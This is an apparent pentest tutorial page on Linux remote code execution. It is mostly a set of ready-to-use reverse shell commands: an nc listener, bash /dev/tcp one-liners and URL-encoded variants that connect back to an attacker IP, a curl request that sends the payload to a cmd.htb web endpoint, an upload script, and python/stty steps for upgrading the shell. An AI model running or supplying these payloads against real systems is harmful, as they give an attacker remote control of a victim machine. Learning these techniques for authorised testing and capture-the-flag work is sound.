Linux Remote Code Execution (RCE)
Remote Code Execution (RCE) also known as Remote Execution is a critical security vulnerability that allows an attacker to run arbitrary code on a target machine from a remote system. Exploiting RCE often results in full system compromise, enabling attackers to execute commands, exfiltrate data, escalate privileges, or pivot within the network.
A common objective when exploiting RCE is to obtain a reverse shell, a command-line connection where the target system connects back to the attacker’s machine. Here you will see the steps do get it with examples.
HOW TO
Step 1: Listener on the Attacker’s Machine
On the attacker system, set up a listener to catch the reverse shell connection:
nc -lvnp <attacker-port>Step 2: Triggering the TCP Reverse Shell on the Target
From the target machine (via the exploited vulnerability), run one of the following payloads:
bash -c "bash -i >%26 /dev/tcp/<attacker-ip>/<attacker-port> 0>%261"
bash -c "bash -i >& /dev/tcp/<attacker-ip>/<attacker-port> 0>&1"
bash+-c+"bash+-i+>%26+/dev/tcp/<attacker-ip>/<attacker-port>+0>%261"with curl
curl http://example.com/path/to/file/cmd.htb --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<attacker-port> 0>&1'"File upload to execute from remote code
#!/bin/bash
bash -i >& /dev/tcp/<attacker-ip>/<attacker-port> 0>&1These commands establish a TCP connection from <target-ip> back to <attacker-ip>, redirecting input and output to provide remote shell access.
Step 3: Upgrading to a Fully Interactive Shell
Once the shell is received, it’s often limited. To improve the experience and gain a more functional terminal:
python3 -c 'import pty; pty.spawn("/bin/bash")'Then suspend the shell (CTRL+Z) and configure the terminal locally:
stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;stty raw -echoThis provides a stable and fully interactive TTY shell.
Sources
For more information and to get help with a reverse shell based on you need, see the best contents below: